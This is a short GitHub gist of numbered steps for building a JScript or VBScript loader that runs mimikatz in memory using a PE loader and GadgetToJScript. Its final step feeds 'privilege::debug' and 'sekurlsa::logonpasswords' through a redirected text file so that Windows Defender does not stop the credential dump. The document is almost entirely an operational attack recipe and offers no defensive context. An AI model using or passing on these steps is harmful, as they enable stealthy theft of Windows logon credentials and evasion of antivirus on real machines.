Steps.txt

October 19, 2019 ยท View on GitHub

  1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases

  2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a

  3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code.

  4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file.

  5. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs"

  6. Download https://github.com/med0x2e/GadgetToJScript and replace TestAssemblyLoader.cs with the updated one.

  7. Build GadgetToJscript using VS. (x64/release).

  8. Create mimikatz.js using GadgetToJscript using: C:< path to GadgetToJscript >\GadgetToJscript.exe -w js -o mimi.js

  9. Launch mimikatz in-memory using: cscript mimi.js (or C:\Windows\SysWow64\cscript.exe)

  10. Same thing can be done for vbscript, use the "-w vbs" switch instead.

  11. In case if windows defender is killing mimikatz when loaded via JS/VBS or when trying to run mimi.js with "privilege::debug sekurlsa...":

a) echo sekurlsa::logonpasswords > safe.txt

b) cscript mimi.js privilege::debug < safe.txt